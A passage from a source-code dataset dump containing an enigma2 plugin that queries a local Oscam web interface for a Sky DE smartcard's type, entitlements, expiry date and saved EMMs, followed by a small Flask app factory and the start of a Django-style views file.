] | 1 | 2016-10-09T15:57:10.000Z | 2016-10-09T15:58:16.000Z | plugin/OscamStatus.py | rdamas/oscam-skyde-status | 68a34b7c55aa7ffa405cd0fe3c74473ea9f70c67 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import base64
import ConfigParser
import fileinput
import json
import os
import re
import requests
from enigma import eTimer, getDesktop, iServiceInformation
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Sources.List import List
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from __init__ import _
class OscamConfig:
"""Auslesen der Config-Files einer laufenden Oscam-Installation
Momentan nur die oscam.conf auslesen, um emmlogdir und Webif-Zugangsdaten
zu ermitteln.
Außerdem eine Methode zum Auslesen der gespeicherten unique EMMs
"""
EMM_OK = 1
EMM_NOT_FOUND = 2
EMM_VAR_LOG = 3
EMM_NOCHANGE = 4
#
# Die Datei mit den gespeicherten Unique EMM einlesen, alle gespeicherten
# EMMs mit letztem aufgetretenem Datum zurückliefern. Zur Darstellung
# am TV die Serial und Data unkenntlich machen.
#
#
# Blank out emmlogdir directive in oscam.conf.
#
class OscamWebif:
"""Methods to fetch information via Oscam web interface:
- do we serve a supported card (V13, V14, Teleclub)?
- what's the label of that card
- get expire dates of entitlements
- write an EMM
"""
#
# GET request for web interface url.
#
# @param url string - url
# @return string - contents of url
#
#
# Read status page from Oscam JSON API
# @return string - json text with status information
#
#
# @param date string - input date string
# @return string - formatted date string
#
#
# Use Oscam JSON API to find out, if we have a local V13/V14 or
# Teleclub card running. We return reader and CAID of that card.
#
# @return None|dict
#
#
# Write EMM via web interface form.
#
# @param reader string - label of affected reader
# @param caid string - caid of affected reader
# @param emm strig - emm to write to card
# @param callback function - where to return to after writing
#
#
# Read payload from one line of live log data.
#
# @return string|None - payload if pattern matches.
#
#
# Read last payload from 10 seconds live log.
# Call callback function after read out.
#
#
# Read payload from live log.
# Switch to debug level 4, set a timer, finish read out in timer callback.
#
# @param callback function - where to return after finishing timer callback.
#
#
# Read tier ID's
#
# @param reader string - label of reader
#
class CardStatus:
"""Class that holds gathered information from running Oscam instance.
Is independent of enigma2 session, so testably without running enigma2.
Is inherited from class OscamStatus.
"""
#
# Look in oscam.version from temp file for ConfigDir parameter
# and supported features.
#
# @param tempdir string - directory where oscam.version lives.
# set self.oscamConfdir string - path to Oscam configuration directory
# set self.oscamWebifSupport bool - is webif support compiled into Oscam
# set self.oscamLivelogSupport - is live log support compiled into Oscam
#
#
# Find Oscam temp dir from running Oscam process.
# Check if process was startet with param -t or --temp-dir
#
# @return string - temp dir where oscam.version lives.
#
#
# Find out where oscam.conf lives.
# First try to to read out /tmp/.oscam/oscam.version
# If that does not exist, try to find it from running Oscam
#
#
# Get an OscamWebif object for communication via Web interface.
#
#
# Read tier IDs and expire date from Oscam web interface.
#
# set self.expires - expire date from webif
# set self.tiers - tiers list from webif
# set self.localhostAccess - can localhost access webif
# set self.webif - @class OscamWebif
# set self.status - reader and caid for Sky from webif
#
#
# Read unique EMM's from Oscam config dir
#
| 37.837838 | 205 | 0.521577 | # -*- coding: utf-8 -*-
import base64
import ConfigParser
import fileinput
import json
import os
import re
import requests
from enigma import eTimer, getDesktop, iServiceInformation
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Sources.List import List
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from __init__ import _
class WebifException(Exception):
pass
class OscamConfig:
"""Auslesen der Config-Files einer laufenden Oscam-Installation
Momentan nur die oscam.conf auslesen, um emmlogdir und Webif-Zugangsdaten
zu ermitteln.
Außerdem eine Methode zum Auslesen der gespeicherten unique EMMs
"""
EMM_OK = 1
EMM_NOT_FOUND = 2
EMM_VAR_LOG = 3
EMM_NOCHANGE = 4
def __init__(self, confdir):
self.confdir = confdir
self.cp = ConfigParser.SafeConfigParser()
self.webif = None
self.emmlogdir = None
self.emmlogfileDate = 0
self._readOscamUser()
def _readOscamUser(self):
read = self.cp.read(self.confdir + '/oscam.conf')
if read:
try:
self.emmlogdir = self.cp.get('global', 'emmlogdir')
if self.emmlogdir == '':
self.emmlogdir = self.confdir
except ConfigParser.NoOptionError:
self.emmlogdir = self.confdir
try:
hostname = self.cp.get('global', 'serverip')
except ConfigParser.NoOptionError:
hostname = 'localhost'
try:
self.cp.set('webif', 'hostname', hostname)
self.webif = self.cp.items('webif')
except ConfigParser.NoSectionError:
pass
def getWebif(self):
if self.webif:
return dict(self.webif)
return None
def _formatDate(self, date):
m = re.match(r"(\d+)/(\d+)/(\d+) (.*)", date)
if m:
return m.group(3)+"."+m.group(2)+"."+m.group(1)+" "+m.group(4)
return date
#
# Die Datei mit den gespeicherten Unique EMM einlesen, alle gespeicherten
# EMMs mit letztem aufgetretenem Datum zurückliefern. Zur Darstellung
# am TV die Serial und Data unkenntlich machen.
#
def getSavedEmm(self, reader):
logfile = self.emmlogdir + '/' + reader + '_unique_emm.log'
print "[OSS OscamConfig.getSavedEmm] versuche '%s' zu lesen" % logfile
seen = {}
ret = []
hint = self.EMM_OK
try:
stat = os.stat(logfile)
if self.emmlogfileDate >= stat.st_mtime:
hint = self.EMM_NOCHANGE
print "[OSS OscamConfig.getSavedEmm] keine neuen EMMs"
else:
self.emmlogfileDate = stat.st_mtime
except OSError as e:
print "[OSS OscamConfig.getSavedEmm] I/O error: %s" % e.strerror
if hint == self.EMM_OK:
try:
with open(logfile, 'r') as log:
for line in log:
m = re.search(r"(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})\s+[0-9A-Z]{16}\s+([0-9A-F]+)\s+", line.rstrip())
if m:
date = m.group(1)
key = m.group(2)
try:
if seen[key]['first'] > date:
seen[key]['first'] = date
if seen[key]['last'] < date:
seen[key]['last'] = date
except KeyError:
seen[key] = {}
seen[key]['first'] = date
seen[key]['last'] = date
except IOError as e:
print "[OSS OscamConfig.getSavedEmm] I/O error: %s" % e.strerror
hint = self.EMM_NOT_FOUND
if self.emmlogdir[0:8] == '/var/log':
hint = self.EMM_VAR_LOG
if seen:
keys = sorted(seen, key=lambda x: seen[x]['last'], reverse=True)
for key in keys:
payload = key[0:6] + ' ' + key[6:8] + ' ######## ' + key[16:30] + ' ...'
ret.append( ( self._formatDate(seen[key]['first']), self._formatDate(seen[key]['last']), payload, key) )
return { 'emm': ret, 'hint': hint }
#
# Blank out emmlogdir directive in oscam.conf.
#
def reconfigEmmlogdir(self):
file = fileinput.input(files=self.confdir+'/oscam.conf', inplace=True, backup='.bak')
for line in file:
line = line.strip()
m = re.search(r"(emmlogdir\s*=)", line)
if m:
line = m.group(1)
print line
file.close()
class OscamWebif:
"""Methods to fetch information via Oscam web interface:
- do we serve a supported card (V13, V14, Teleclub)?
- what's the label of that card
- get expire dates of entitlements
- write an EMM
"""
def __init__(self, host, port, user=None, password=None):
self.webif = 'http://'+host+':'+port
self.user = user
self.password = password
self.timer = eTimer()
self.timer.callback.append(self.extractPayload)
self.callback = None
if password:
password = '########'
if user:
user = '########'
print "[OSS OscamWebif.__init__] OscamWebif(%s, %s, %s, %s)" % (host, port, user, password)
#
# GET request for web interface url.
#
# @param url string - url
# @return string - contents of url
#
def _get(self, url):
try:
if self.user:
r = requests.get(url, auth=requests.auth.HTTPDigestAuth(self.user, self.password))
else:
r = requests.get(url)
print "[OSS OscamWebif._get] URL: %s => %s" % (url, r.status_code)
if r.status_code != 200:
raise WebifException(r.status_code)
except Exception as e:
print "[OSS OscamWebif._get] catch exception", e
raise WebifException(521)
return r.text
#
# Read status page from Oscam JSON API
# @return string - json text with status information
#
def getStatus(self):
url = self.webif+'/oscamapi.json?part=status'
return self._get(url)
#
# @param date string - input date string
# @return string - formatted date string
#
def _formatDate(self, date):
m = re.match(r"(\d+)-(\d+)-(\d+)T.*", date)
if m:
return m.group(3)+". "+m.group(2)+". "+m.group(1)
return date
#
# Use Oscam JSON API to find out, if we have a local V13/V14 or
# Teleclub card running. We return reader and CAID of that card.
#
# @return None|dict
#
def getStatusSky(self):
status = self.getStatus()
reader = None
caid = None
if status:
obj = json.loads(status)
clients = obj['oscam']['status']['client']
for client in clients:
conn = client['connection']
if conn['$'] == 'CARDOK':
for ent in conn['entitlements']:
if ent['caid'] in ['09C4', '098C', '09B6']:
reader = client['rname_enc']
caid = ent['caid']
break
else:
ent = self.getTiers(client['rname_enc'])
if ent['caid'] in ['09C4', '098C', '09B6']:
reader = client['rname_enc']
caid = ent['caid']
break
if reader and caid:
return { 'reader': reader, 'caid': caid }
return None
#
# Write EMM via web interface form.
#
# @param reader string - label of affected reader
# @param caid string - caid of affected reader
# @param emm strig - emm to write to card
# @param callback function - where to return to after writing
#
def writeEmm(self, reader, caid, emm, callback):
url = self.webif+'/emm_running.html?label=%s&emmfile=&emmcaid=%s&ep=%s&action=Launch' % (reader,caid,emm)
self._get(url)
callback()
#
# Read payload from one line of live log data.
#
# @return string|None - payload if pattern matches.
#
def getPayloadFromLine(self,line):
m = re.search('(0F 0[46] .. .. .. .. .. ..)', line)
if m:
return m.group(1)
return None
#
# Read last payload from 10 seconds live log.
# Call callback function after read out.
#
def extractPayload(self):
url = self.webif+'/logpoll.html?debug=0'
logpoll = self._get(url)
payload = None
try:
obj = json.loads(logpoll)
lines = obj['oscam']['lines']
foundPayloadHeader = False
lookAhead = 2
for line in lines:
decoded = base64.b64decode(line['line'])
if foundPayloadHeader:
lookAhead -= 1
if lookAhead == 0:
payload = self.getPayloadFromLine(decoded)
foundPayloadHeader = False
continue
if 'Decrypted payload' in decoded:
lookAhead = 2
foundPayloadHeader = True
except Exception as e:
print "[OSS OscamWebif.extractPayload] catch exception", e
if self.callback:
self.callback(payload)
#
# Read payload from live log.
# Switch to debug level 4, set a timer, finish read out in timer callback.
#
# @param callback function - where to return after finishing timer callback.
#
def fetchPayload(self, callback):
url = self.webif+'/logpoll.html?debug=4'
self._get(url)
self.callback = callback
self.timer.start(10000, True)
#
# Read tier ID's
#
# @param reader string - label of reader
#
def getTiers(self, reader):
url = self.webif+'/oscamapi.json?part=entitlement&label=%s' % reader
entitlements = self._get(url)
tiers = []
expires = None
caid = None
try:
obj = json.loads(entitlements)
for line in obj['oscam']['entitlements']:
tiers.append( line['id'][-4:] )
if not expires and line['id'][-4:-2] == '00':
expires = self._formatDate(line['expireDate'])
caid = line['caid']
except:
pass
return { 'tiers': tiers, 'expires': expires, 'caid': caid }
class CardStatus:
"""Class that holds gathered information from running Oscam instance.
Is independent of enigma2 session, so testably without running enigma2.
Is inherited from class OscamStatus.
"""
def __init__(self, session):
self.session = session
self.oscamConfdir = None
self.oscamWebifSupport = None
self.oscamLivelogSupport = None
self.oscamWebifPort = None
self.localhostAccess = None
self.status = None
self.tiers = None
self.hint = None
self.expires = None
self.list = None
self.webif = None
self.oscamConfig = None
self.getOscamInformation()
#
# Look in oscam.version from temp file for ConfigDir parameter
# and supported features.
#
# @param tempdir string - directory where oscam.version lives.
# set self.oscamConfdir string - path to Oscam configuration directory
# set self.oscamWebifSupport bool - is webif support compiled into Oscam
# set self.oscamLivelogSupport - is live log support compiled into Oscam
#
def readOscamVersion(self, tempdir):
try:
for line in open(os.path.join(tempdir, 'oscam.version'), 'rb'):
if 'ConfigDir:' in line:
self.oscamConfdir = line.split(":")[1].strip()
print "[OSS CardStatus.readOscamVersion] confdir:", self.oscamConfdir
if 'Web interface support:' in line:
self.oscamWebifSupport = line.split(":")[1].strip() == 'yes'
print "[OSS CardStatus.readOscamVersion] webif support:", self.oscamWebifSupport
if 'LiveLog support:' in line:
self.oscamLivelogSupport = line.split(":")[1].strip() == 'yes'
print "[OSS CardStatus.readOscamVersion] livelog support:", self.oscamLivelogSupport
if 'WebifPort:' in line:
self.oscamWebifPort = line.split(":")[1].strip()
print "[OSS CardStatus.readOscamVersion] webif port:", self.oscamWebifPort
#
# Konfiguration ohne Webinterface
if self.oscamWebifPort == "0":
self.oscamWebifSupport = False
print "[OSS CardStatus.readOscamVersion] webif not enabled"
except Exception as e:
print "[OSS CardStatus.readOscamVersion] kann", tempdir, "nicht öffnen:", e
#
# Find Oscam temp dir from running Oscam process.
# Check if process was startet with param -t or --temp-dir
#
# @return string - temp dir where oscam.version lives.
#
def getOscamTempdir(self):
tempdir = None
pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
for pid in pids:
try:
cmdline = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read()
cmdpart = cmdline.lower().split('\0')
# @tested
if '/oscam' in cmdpart[0] or cmdpart[0][0:5] == 'oscam':
nextIsTempDir = False
for part in cmdpart:
# @tested
if '--temp-dir' in part:
tempdir = part[11:]
break
# @tested
if part == '-t':
nextIsTempDir = True
continue
if nextIsTempDir:
tempdir = part.rstrip('/')
nextIsTempDir = False
break
except IOError: # proc has terminated
continue
return tempdir
#
# Find out where oscam.conf lives.
# First try to to read out /tmp/.oscam/oscam.version
# If that does not exist, try to find it from running Oscam
#
def getOscamInformation(self):
tempdir = '/tmp/.oscam'
# @tested
if not os.path.exists(tempdir):
tempdir = self.getOscamTempdir()
# @tested
if tempdir and os.path.exists(tempdir):
self.readOscamVersion(tempdir)
#
# Get an OscamWebif object for communication via Web interface.
#
def getOscamWebif(self):
if self.oscamWebifSupport:
user = self.oscamConfig.getWebif()
httpuser = None
httppwd = None
if user:
try:
httpuser = user['httpuser']
except KeyError:
pass
try:
httppwd = user['httppwd']
except KeyError:
pass
self.localhostAccess = True
try:
httpallowed = user['httpallowed']
print "[OSS CardStatus.getOscamWebif] httpallowed:", httpallowed
if '127.0.0.' not in httpallowed and '::1' not in httpallowed:
self.localhostAccess = False
except:
pass
# null config Oscam
elif self.oscamWebifPort:
user = { 'hostname': '127.0.0.1', 'httpport': self.oscamWebifPort, }
return OscamWebif(user['hostname'], user['httpport'], httpuser, httppwd)
else:
print "[OSS CardStatus.getOscamWebif] no webif support"
raise WebifException(501)
#
# Read tier IDs and expire date from Oscam web interface.
#
# set self.expires - expire date from webif
# set self.tiers - tiers list from webif
# set self.localhostAccess - can localhost access webif
# set self.webif - @class OscamWebif
# set self.status - reader and caid for Sky from webif
#
def getCardStatus(self):
#
# Jetzt aus der oscam.conf die Webif-Config auslesen
#
if self.oscamConfdir:
# Über die Oscam-Webapi V13/V14-Reader suchen
self.oscamConfig = OscamConfig(self.oscamConfdir)
self.webif = self.getOscamWebif()
try:
self.status = self.webif.getStatusSky()
except WebifException as e:
print "[OSS CardStatus.getCardStatus] catch exception", e
if self.status:
# gespeicherte unique EMMs anzeigen
self.getSavedEmm()
# Tier-IDs und Expire-Datum der Karte auslesen
try:
tiers = self.webif.getTiers(self.status['reader'])
self.tiers = tiers['tiers']
self.expires = tiers['expires']
except WebifException as e:
print "[OSS CardStatus.getCardStatus] catch exception", e
else:
print "[OSS CardStatus.getCardStatus] no oscam conf dir found"
#
# Read unique EMM's from Oscam config dir
#
def getSavedEmm(self):
print "[OSS CardStatus.getSavedEmms] "
if self.status:
retemm = self.oscamConfig.getSavedEmm(self.status['reader'])
self.hint = retemm['hint']
self.list = [ ("Erstes Vorkommen", "Letztes Vorkommen", "EMM", "")]
self.list.extend( retemm['emm'] )
print "[OSS CardStatus.getSavedEmms] show", len(retemm['emm']), "EMMs"
class OscamStatus(Screen, CardStatus):
version = "2017-06-14 1.4"
skin = { "fhd": """
<screen name="OscamStatus" position="0,0" size="1920,1080" title="Oscam Sky DE Status" flags="wfNoBorder">
<widget name="expires" position="20,20" size="600,36" font="Regular;25" />
<widget name="payload" position="620,20" size="700,36" font="Regular;25" />
<widget name="f0tier" position="1340,20" size="400,36" font="Regular;25" />
<widget name="headline" position="20,60" size="1320,76" font="Regular;25" />
<widget name="cardtype" position="1340,60" size="400,76" font="Regular;25" />
<widget render="Listbox" source="emmlist" enableWrapAround="0"
position="20,100" size="1880,880" transparent="1"
font="Regular;25" zPosition="5" scrollbarMode="showOnDemand"
scrollbarSliderBorderWidth="0" scrollbarWidth="5">
<convert type="TemplatedMultiContent">{
"template": [
MultiContentEntryText(
pos = (10, 10),
size = (380, 40),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 0),
MultiContentEntryText(
pos = (400, 10),
size = (380, 40),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 1),
MultiContentEntryText(
pos = (790, 10),
size = (1000, 40),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP | RT_WRAP,
text = 2),
],
"fonts": [gFont("Regular", 24)],
"itemHeight": 50 }
</convert>
</widget>
<widget name="key_red" position="20,1000" zPosition="1" size="400,50" font="Regular;20" halign="center" valign="center" backgroundColor="#f01010" foregroundColor="#ffffff" transparent="0" />
<widget name="key_green" position="440,1000" zPosition="1" size="400,50" font="Regular;20" halign="center" valign="center" backgroundColor="#10a010" foregroundColor="#ffffff" transparent="0" />
</screen>
""",
"hd": """
<screen name="OscamStatus" position="0,0" size="1280,720" title="Oscam Sky DE Status" flags="wfNoBorder">
<widget name="expires" position="10,10" size="400,24" font="Regular;18" />
<widget name="payload" position="420,10" size="430,24" font="Regular;18" />
<widget name="f0tier" position="860,10" size="330,24" font="Regular;18" />
<widget name="headline" position="10,40" size="840,45" font="Regular;18" />
<widget name="cardtype" position="860,40" size="330,45" font="Regular;18" />
<widget render="Listbox" source="emmlist" enableWrapAround="0"
position="10,90" size="1260,560" transparent="1"
font="Regular;18" zPosition="5" scrollbarMode="showOnDemand"
scrollbarSliderBorderWidth="0" scrollbarWidth="5">
<convert type="TemplatedMultiContent">{
"template": [
MultiContentEntryText(
pos = (10, 10),
size = (250, 33),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 0),
MultiContentEntryText(
pos = (270, 10),
size = (250, 33),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 1),
MultiContentEntryText(
pos = (530, 10),
size = (640, 33),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP | RT_WRAP,
text = 2),
],
"fonts": [gFont("Regular", 18)],
"itemHeight": 40 }
</convert>
</widget>
<widget name="key_red" position="10,666" zPosition="1" size="300,33" font="Regular;16" halign="center" valign="center" backgroundColor="#f01010" foregroundColor="#ffffff" transparent="0" />
<widget name="key_green" position="320,666" zPosition="1" size="300,33" font="Regular;16" halign="center" valign="center" backgroundColor="#10a010" foregroundColor="#ffffff" transparent="0" />
</screen>
""" }
hintText = {
1: 'Liste der gespeicherten EMMs - mit OK zum Schreiben auswählen.',
2: 'Keine EMMs gefunden. 90 Minuten auf einem Sky-Kanal warten.',
3: 'Keine EMMs. Tipp: "emmlogdir" mit "grün" fixen.'
}
def __init__(self, session):
self.session = session
self.status = None
self.list = None
self.tiers = None
self.expires = None
self.hint = None
self.emmToWrite = None
self.payload = None
self.adaptScreen()
self.skin = OscamStatus.skin[self.useskin]
self.timerRereadEmms = eTimer()
self.timerRereadEmms.callback.append(self.showEmms)
CardStatus.__init__(self, session)
Screen.__init__(self, session)
self['actions'] = ActionMap(['ColorActions', 'WizardActions'], {
"back": self.cancel,
"ok": self.ok,
"red": self.red,
"green": self.green,
}, -1)
self['key_red'] = Label(_("Payload ermitteln"))
self['key_green'] = Label()
self['payload'] = Label(_("Payload: rot drücken"))
self['f0tier'] = Label()
self['cardtype'] = Label()
self['headline'] = Label()
self['expires'] = Label()
self['emmlist'] = List()
self.onLayoutFinish.append(self.showCardStatus)
def cancel(self):
self.timerRereadEmms.stop()
if self.webif:
self.webif.timer.stop()
self.close()
#
# Write selected EMM to card after confirmation.
#
def ok(self):
self.emmToWrite = str(self['emmlist'].getCurrent()[3])
if self.emmToWrite != "":
self.session.openWithCallback(
self.writeEmm,
MessageBox,
_("Folgendes EMM wirklich schreiben?\n%s") % self.emmToWrite,
type = MessageBox.TYPE_YESNO,
timeout = -1
)
#
# Fetch card payload from Oscam livelog after confirmation.
#
def red(self):
if self.oscamWebifSupport:
self.payload = None
# try to fetch payload if we are on a Sky service.
# If card is Teleclub, try to fetch payload anyway, as I don't have
# enough information for the check.
if self.isProviderSky() or self.getCardtype() == "Teleclub":
if self.oscamLivelogSupport:
self.session.openWithCallback(
self.fetchPayload,
MessageBox,
_("Das Ermitteln des Payloads dauert etwa 10 Sekunden.\nFortfahren?"),
type = MessageBox.TYPE_YESNO,
timeout = -1
)
else:
self.session.open(
MessageBox,
_("Der Payload kann nicht ermittelt werden, da Oscam ohne Livelog-Support übersetzt wurde."),
MessageBox.TYPE_INFO
)
else:
self.session.open(
MessageBox,
_("Der Payload kann nur auf einem abonnierten Sky-Sender ermittelt werden."),
MessageBox.TYPE_INFO
)
#
# Blank out emmlogdir directive in oscam.conf after confirmation.
#
def green(self):
if self.hint == OscamConfig.EMM_VAR_LOG:
self.session.openWithCallback(
self.reconfigEmmlogdir,
MessageBox,
_("Die oscam.conf kann jetzt so angepasst werden,\ndass EMM's dauerhaft gespeichert werden. Fortfahren?"),
type = MessageBox.TYPE_YESNO,
timeout = -1
)
#
# Compute text for "f0tier" label
#
def getF0text(self):
f0text = _("unbekannt")
if self.tiers:
if "00F0" in self.tiers:
f0text = _("ja")
else:
f0text = _("nein")
return f0text
#
# Compute text for "cardtype" label
#
def getCardtype(self):
cardtype = "unbekannt"
if self.status:
caid = self.status['caid']
if caid == "09C4":
cardtype = "V13"
elif caid == "098C":
cardtype = "V14"
elif caid == "09B6":
cardtype = "Teleclub"
return cardtype
#
# Compute card status information and set Screen elements accordingly.
#
def showCardStatus(self):
try:
self.getCardStatus()
self['f0tier'].setText(_("F0-Tier vorhanden: %s") % self.getF0text() )
self['cardtype'].setText( _("Kartentyp: %s") % self.getCardtype() )
if self.expires:
self['expires'].setText(_("Karte läuft ab am: %s") % str(self.expires))
else:
self['expires'].setText(_("Status konnte nicht ermittelt werden."))
if self.status:
try:
self['headline'].setText(_(self.hintText[self.hint]))
except KeyError:
pass
self['emmlist'].setList(self.list)
self.timerRereadEmms.start(60000, True)
if self.list and len(self.list) < 2 and self.hint == OscamConfig.EMM_VAR_LOG:
self['key_green'].setText(_("Emmlogdir fixen"))
else:
if self.localhostAccess:
self['headline'].setText(_("Ist Oscam gestartet? Läuft eine lokale V13/V14 Karte?"))
else:
self['headline'].setText(_("In oscam.conf muss für 127.0.0.1 Zugriff erlaubt werden."))
except WebifException as e:
self['headline'].setText(_("Das Webinterface scheint nicht konfiguriert zu sein."))
self['key_red'].setText("")
self['payload'].setText("")
def showEmms(self):
self.getSavedEmm()
if self.hint != OscamConfig.EMM_NOCHANGE:
self['emmlist'].setList(self.list)
self.timerRereadEmms.start(60000, True)
#
# Write selected EMM to card using web interface
# Callback function on OK click.
#
def writeEmm(self, retval):
if retval:
try:
self.webif.writeEmm(self.status['reader'], self.status['caid'], self.emmToWrite, self.callbackWriteEmm)
except WebifException as e:
print "[OSS OscamStatus.writeEmm] catch exception", e
#
# Web interface callback after writing EMM
#
def callbackWriteEmm(self):
try:
tiers = self.webif.getTiers(self.status['reader'])
self.expires = tiers['expires']
self['expires'].setText(_("Karte läuft ab am: %s") % str(self.expires))
except WebifException as e:
print "[OSS OscamStatus.callbackWriteEmm] catch exception", e
#
# Read payload information
# Callback action on RED click.
#
def fetchPayload(self, retval):
if retval:
self['payload'].setText(_("Payload wird ermittelt"))
try:
self.webif.fetchPayload(self.callbackFetchPayload)
except WebifException as e:
print "[OSS OscamStatus.fetchPayload] catch exception", e
#
# Web interface callback after reading payload
#
def callbackFetchPayload(self, payload):
self.payload = payload
if self.payload:
self['payload'].setText(_("Payload: %s") % str(self.payload))
info = ""
if self.payload.startswith("0F 04 00 00 00 00") or self.payload.startswith("0F 06 00 00 00 00"):
info = "Die Karte ist aktiv und nicht gepairt"
elif self.payload.startswith("0F 04 00 10 20 00") or self.payload.startswith("0F 06 00 10 20 00"):
info = "Die Karte muss verlängert werden"
elif self.payload.startswith("0F 04 00 10 00 00") or self.payload.startswith("0F 06 00 10 00 00"):
info = "Die Karte ist gepairt"
elif self.payload.startswith("0F 04 00 00 20 00") or self.payload.startswith("0F 06 00 00 20 00"):
info = "Dieser Sender ist nicht abonniert"
self.session.open(MessageBox, _("Der Payload ist: %s\n%s") % (self.payload, info), MessageBox.TYPE_INFO)
else:
self['payload'].setText(_("Payload konnte nicht ermittelt werden."))
#
# Blank out emmlogdir directive in oscam.conf
# Callback action on GREEN click if applicable
#
def reconfigEmmlogdir(self, retval):
if retval:
self.oscamConfig.reconfigEmmlogdir()
self.hint = OscamConfig.EMM_NOT_FOUND
self['key_green'].setText('')
self['headline'].setText(_(self.hintText[self.hint]))
#
# Check whether we are serving Sky
#
def isProviderSky(self):
service = self.session.nav.getCurrentService()
info = service and service.info()
if info:
# On Sky 1 cards are reported "paired", so skip Sky 1.
print "[OSS OscamStatus.isProviderSky] payload on", info.getName()
if info.getName().replace('\xc2\x86','').replace('\xc2\x87','').startswith('Sky 1'):
return False
# fetch ONID (Original Network ID) and make sure it belongs to Sky (133).
onid = info.getInfo(iServiceInformation.sONID)
# Skip services like Sky News that are FTA.
isCrypted = info.getInfo(iServiceInformation.sIsCrypted)
print "[OSS OscamStatus.isProviderSky] ONID=%d, isCrypted=%d" % (onid, isCrypted)
return onid == 133 and isCrypted == 1
return False
#
# Compute size of desktop. Screen will be chosen accordingly.
#
def adaptScreen(self):
fb_w = getDesktop(0).size().width()
if fb_w < 1920:
self.useskin = "hd"
else:
self.useskin = "fhd"
| 22,163 | 6,627 | 673 |
0a5b73243a48019d002b8f2fb808eb1f41ab86fc | 2,486 | py | Python | app/__init__.py | cletuzz00/insuranceclaimfraud | 9723781ec6368f19cacc2d537ce5ebc3652ce812 | [
"MIT"
] | 23 | 2019-11-29T19:53:50.000Z | 2022-03-11T16:47:21.000Z | app/__init__.py | cletuzz00/insuranceclaimfraud | 9723781ec6368f19cacc2d537ce5ebc3652ce812 | [
"MIT"
] | 15 | 2020-03-21T20:43:05.000Z | 2020-11-09T22:15:37.000Z | app/__init__.py | cletuzz00/insuranceclaimfraud | 9723781ec6368f19cacc2d537ce5ebc3652ce812 | [
"MIT"
] | 11 | 2019-12-05T12:25:53.000Z | 2020-10-20T15:25:19.000Z | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from flask import Flask, url_for
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
from importlib import import_module
from logging import basicConfig, DEBUG, getLogger, StreamHandler
from os import path
db = SQLAlchemy()
login_manager = LoginManager()
def apply_themes(app):
"""
Add support for themes.
If DEFAULT_THEME is set then all calls to
url_for('static', filename='')
will modfify the url to include the theme name
The theme parameter can be set directly in url_for as well:
ex. url_for('static', filename='', theme='')
If the file cannot be found in the /static/<theme>/ location then
the url will not be modified and the file is expected to be
in the default /static/ location
"""
@app.context_processor
| 29.247059 | 82 | 0.672566 | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from flask import Flask, url_for
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
from importlib import import_module
from logging import basicConfig, DEBUG, getLogger, StreamHandler
from os import path
db = SQLAlchemy()
login_manager = LoginManager()
def register_extensions(app):
db.init_app(app)
login_manager.init_app(app)
def register_blueprints(app):
for module_name in ('base', 'home'):
module = import_module('app.{}.routes'.format(module_name))
app.register_blueprint(module.blueprint)
def configure_database(app):
@app.before_first_request
def initialize_database():
db.create_all()
@app.teardown_request
def shutdown_session(exception=None):
db.session.remove()
def configure_logs(app):
# soft logging
try:
basicConfig(filename='error.log', level=DEBUG)
logger = getLogger()
logger.addHandler(StreamHandler())
except:
pass
def apply_themes(app):
"""
Add support for themes.
If DEFAULT_THEME is set then all calls to
url_for('static', filename='')
will modfify the url to include the theme name
The theme parameter can be set directly in url_for as well:
ex. url_for('static', filename='', theme='')
If the file cannot be found in the /static/<theme>/ location then
the url will not be modified and the file is expected to be
in the default /static/ location
"""
@app.context_processor
def override_url_for():
return dict(url_for=_generate_url_for_theme)
def _generate_url_for_theme(endpoint, **values):
if endpoint.endswith('static'):
themename = values.get('theme', None) or \
app.config.get('DEFAULT_THEME', None)
if themename:
theme_file = "{}/{}".format(themename, values.get('filename', ''))
if path.isfile(path.join(app.static_folder, theme_file)):
values['filename'] = theme_file
return url_for(endpoint, **values)
def create_app(config, selenium=False):
app = Flask(__name__, static_folder='base/static')
app.config.from_object(config)
if selenium:
app.config['LOGIN_DISABLED'] = True
register_extensions(app)
register_blueprints(app)
configure_database(app)
configure_logs(app)
apply_themes(app)
return app
| 1,425 | 0 | 168 |
a1c4e4caa2cf815e38d5be1495a90e5c6321be82 | 8,968 | py | Python | bcs-ui/backend/templatesets/legacy_apps/configuration/yaml_mode/views.py | kayinli/bk-bcs | 93a0856175f7b066ef835921572c1cac590dbd8e | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/templatesets/legacy_apps/configuration/yaml_mode/views.py | kayinli/bk-bcs | 93a0856175f7b066ef835921572c1cac590dbd8e | [
"Apache-2.0"
] | null | null | null | bcs-ui/backend/templatesets/legacy_apps/configuration/yaml_mode/views.py | kayinli/bk-bcs | 93a0856175f7b066ef835921572c1cac590dbd8e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import logging
from rest_framework import viewsets
